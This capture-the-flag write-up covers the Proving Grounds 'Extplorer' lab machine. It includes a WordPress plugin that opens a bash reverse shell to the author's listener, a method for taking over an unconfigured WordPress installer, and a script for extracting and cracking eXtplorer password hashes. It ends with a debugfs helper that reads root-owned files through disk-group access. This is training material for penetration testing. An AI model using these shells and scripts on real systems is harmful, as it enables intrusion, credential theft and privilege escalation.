Extplorer - Proving Grounds Practice
Enumeration
Nmap
The initial Nmap scan showed two open ports: SSH and HTTP.
Web Enumeration
Visiting port 80 brought up the WordPress installation wizard: the site had been deployed but never configured, so anyone who reached it could complete the setup. The installer needs a MySQL database, and that database does not have to live on the target, so I hosted one on my attacking machine with Docker and exposed it on port 3306:
sudo docker run --name db-mysql -e MYSQL_ROOT_PASSWORD=rootpass -e MYSQL_DATABASE=wordpress -e MYSQL_USER=dbuser -e MYSQL_PASSWORD=dbpassword -p 3306:3306 -d mysql:latest
In the wizard I pointed the database settings at my host's IP with the database name and credentials above (wordpress / dbuser / dbpassword) and ran the installation.
I created the administrator account with username admin and password admin.
Once the install finished, I logged straight into the admin dashboard.
Exploitation
(1st Way) Custom Plugin RCE
I wrote a minimal plugin whose only content is a reverse-shell exec() call (the IP and port are my listener):
<?php
/**
 * Plugin Name: Wordpress Reverse Shell
 * Author: mto
 */
// Runs when the plugin is activated: connects back to the listener on 192.168.45.249:8080
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.249/8080 0>&1'");
?>
I zipped the plugin directory and uploaded the archive through Plugins > Add New > Upload Plugin, with a listener already waiting on port 8080.
The moment I activated the plugin, WordPress executed the file and I got a reverse shell.
(2nd Way) Extplorer File Upload to RCE
Completing the WordPress install is not actually necessary. Directory fuzzing against port 80 would have found the /filemanager endpoint, which was running eXtplorer, a PHP web file manager.
Its upload feature could drop a PHP reverse shell into the web root, and requesting that file in a browser would give the same shell.
Lateral Movement
Extplorer Configs
While going through the web root from the shell I came across the filemanager directory that hosts eXtplorer. eXtplorer keeps its own user list in filemanager/config/.htusers.php, and that file contained a password hash for the user dora.
Blowfish Crack
The hash was a Blowfish-based bcrypt crypt hash, so I ran it against rockyou.txt and it cracked.
The recovered password worked for dora's local account as well, which got me the user flag.
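To make the hash step reproducible, here is an added helper (mine, not from the writeup) that pulls user:hash pairs out of an .htusers.php and names the john/hashcat format from each hash's shape. The sample file it writes is constructed to match eXtplorer's layout; its hashes are md5("admin") for admin and a placeholder string with bcrypt's shape for dora, not the box's real values. The rockyou path is Kali's default and is an assumption.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup.
# Pull credentials out of eXtplorer's .htusers.php and prep them for cracking.
set -eu

# eXtplorer stores each account as array('name','hash',home,url,...) inside
# $GLOBALS["users"]. Splitting on single quotes makes the name field 2 and the
# hash field 4; lines are emitted in john's user:hash format.
htusers_to_john() {  # $1 = path to .htusers.php
    awk -F "'" '/^[[:space:]]*array\(/ && NF >= 5 { print $2 ":" $4 }' "$1"
}

# Name the cracker format from the hash's shape. eXtplorer has used plain MD5
# (older builds) and Blowfish crypt/bcrypt (this box); anything else is
# reported as unknown rather than guessed.
hash_format() {  # $1 = hash  -> john format name
    case "$1" in
        '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;   # hashcat -m 3200
        *)
            if [ "${#1}" -eq 32 ] && [ -z "$(printf '%s' "$1" | tr -d '0-9a-fA-F')" ]; then
                echo Raw-MD5                       # hashcat -m 0
            else
                echo unknown
            fi ;;
    esac
}

# Constructed sample in the .htusers.php layout (NOT the real file from the box):
# admin's hash is md5("admin"); dora's is a placeholder with bcrypt's $2a$08$ shape.
write_sample_htusers() {  # $1 = output path
    cat > "$1" <<'EOF'
<?php
if( !defined( '_JEXEC' ) && !defined( '_VALID_MOS' ) ) die( 'Restricted access' );
$GLOBALS["users"]=array(
    array('admin','21232f297a57a5a743894a0e4a801fc3','/var/www/html','http://localhost','1','','1',1),
    array('dora','$2a$08$abcdefghijklmnopqrstuuABCDEFGHIJKLMNOPQRSTUVWXYZ01234','/var/www/html','http://localhost','1','','1',1),
);
?>
EOF
}

# Stand-alone use: ./htusers.sh /path/to/.htusers.php
# Writes <file>.john and prints one john command per hash format found.
if [ -n "${1:-}" ]; then
    htusers_to_john "$1" > "$1.john"
    cut -d: -f2 "$1.john" | while read -r h; do hash_format "$h"; done | sort -u \
        | while read -r fmt; do
            echo "john --format=$fmt --wordlist=/usr/share/wordlists/rockyou.txt '$1.john'"
          done
fi
```

bcrypt with cost 8 is slow to crack compared with MD5, so trim the wordlist or use hashcat on a GPU if rockyou does not land quickly; the format detection is there so you do not waste a run with the wrong mode.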
Privilege Escalation
Disk Group
The dora user was a member of the disk group.
That group is dangerous because it grants read and write access to the raw block devices under /dev, so the kernel's permission checks on the mounted filesystem no longer apply: debugfs can open the root filesystem's device directly and read any file on it, root's included. First I ran df -h to find which device is mounted at / (the root filesystem).
Then I opened that device with debugfs and read the root flag out of /root.
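An added helper, written for this note rather than taken from the writeup, that wraps the disk-group trick: it checks group membership, resolves the device and filesystem type behind a mount from /proc/mounts (the same answer df -h gives), refuses filesystems debugfs cannot parse, and reads a file through debugfs. The /root/proof.txt path is the usual Proving Grounds location and is an assumption.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup.
# Read files off the raw root device with debugfs when the user is in group "disk".
set -eu

# 0 if the current user belongs to group disk, 1 otherwise.
in_disk_group() { id -Gn | tr ' ' '\n' | grep -qx disk; }

# Device and filesystem type behind the mount point in $1 (default /), from
# /proc/mounts. Equivalent to what df -h / shows; the last entry wins because a
# later mount on the same path shadows earlier ones.
mount_info() {  # $1 = mount point -> "device fstype"
    awk -v m="${1:-/}" '$2 == m { dev = $1; fs = $3 } END { print dev, fs }' /proc/mounts
}
backing_device() { mount_info "${1:-/}" | cut -d' ' -f1; }
fs_type()        { mount_info "${1:-/}" | cut -d' ' -f2; }

# debugfs only parses ext2/3/4. An LVM volume (/dev/mapper/...) is fine because it
# still holds an ext filesystem; overlay, xfs, btrfs or zfs roots are not.
debugfs_supports() {  # $1 = fstype
    case "$1" in ext2|ext3|ext4) return 0 ;; *) return 1 ;; esac
}

# Read one file through the block device instead of the mounted tree, so the
# mode bits on /root and its contents are never consulted.
debugfs_cat() {  # $1 = absolute path on the root fs
    local dev fs
    dev=$(backing_device /); fs=$(fs_type /)
    debugfs_supports "$fs" || { echo "debugfs cannot read $fs on $dev" >&2; return 1; }
    debugfs -R "cat $1" "$dev" 2>/dev/null
}

# Stand-alone use: ./diskread.sh /root/proof.txt   (the path is an assumption)
if [ -n "${1:-}" ]; then
    in_disk_group || echo "warning: not in group disk, debugfs will likely fail" >&2
    echo "root fs: $(backing_device /) ($(fs_type /))"
    debugfs_cat "$1"
fi
```

debugfs -R 'ls -l /root' "$(backing_device /)" lists the directory the same way if you do not know the file name yet; every read here goes through the device node, so it succeeds purely because of the disk group membership and regardless of who owns /root.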